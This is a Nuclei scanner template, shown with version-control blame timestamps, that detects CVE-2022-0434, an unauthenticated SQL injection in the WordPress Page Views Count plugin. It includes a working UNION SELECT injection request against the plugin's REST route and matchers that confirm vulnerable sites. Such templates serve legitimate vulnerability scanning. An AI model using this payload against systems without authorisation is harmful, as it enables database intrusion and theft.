2022-09-29 11:51:03 +00:00
|
|
|
id: CVE-2022-0434
|
|
|
|
|
|
|
|
info:
|
2022-10-12 09:05:29 +00:00
|
|
|
name: Page Views Count < 2.4.15 - Unauthenticated SQL Injection
|
2022-09-29 11:51:03 +00:00
|
|
|
author: theamanrawat
|
2022-10-12 09:05:29 +00:00
|
|
|
severity: critical
|
2022-09-29 11:51:03 +00:00
|
|
|
description: |
|
|
|
|
Unauthenticated SQL Injection in WordPress Page Views Count Plugin (versions < 2.4.15).
|
|
|
|
reference:
|
|
|
|
- https://wpscan.com/vulnerability/be895016-7365-4ce4-a54f-f36d0ef2d6f1
|
|
|
|
- https://wordpress.org/plugins/page-views-count/
|
2022-10-12 09:05:29 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0434
|
2022-09-29 11:51:03 +00:00
|
|
|
classification:
|
2022-10-14 10:15:14 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.8
|
2022-09-29 11:51:03 +00:00
|
|
|
cve-id: CVE-2022-0434
|
2022-10-14 10:15:14 +00:00
|
|
|
cwe-id: CWE-89
|
2022-09-29 11:51:03 +00:00
|
|
|
metadata:
|
2022-10-14 10:15:14 +00:00
|
|
|
verified: "true"
|
2022-10-12 09:05:29 +00:00
|
|
|
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wpscan,unauth
|
|
|
|
|
|
|
|
variables:
|
|
|
|
num: "999999999"
|
2022-09-29 11:51:03 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
2022-10-12 09:05:29 +00:00
|
|
|
GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5({{num}}),null,null%20--%20g HTTP/1.1
|
2022-09-29 11:51:03 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2022-10-12 09:05:29 +00:00
|
|
|
- type: word
|
2022-09-29 11:51:03 +00:00
|
|
|
part: body
|
2022-10-12 09:05:29 +00:00
|
|
|
words:
|
|
|
|
- '{{md5(num)}}'
|
2022-09-29 11:51:03 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
2022-10-12 09:05:29 +00:00
|
|
|
- 200
|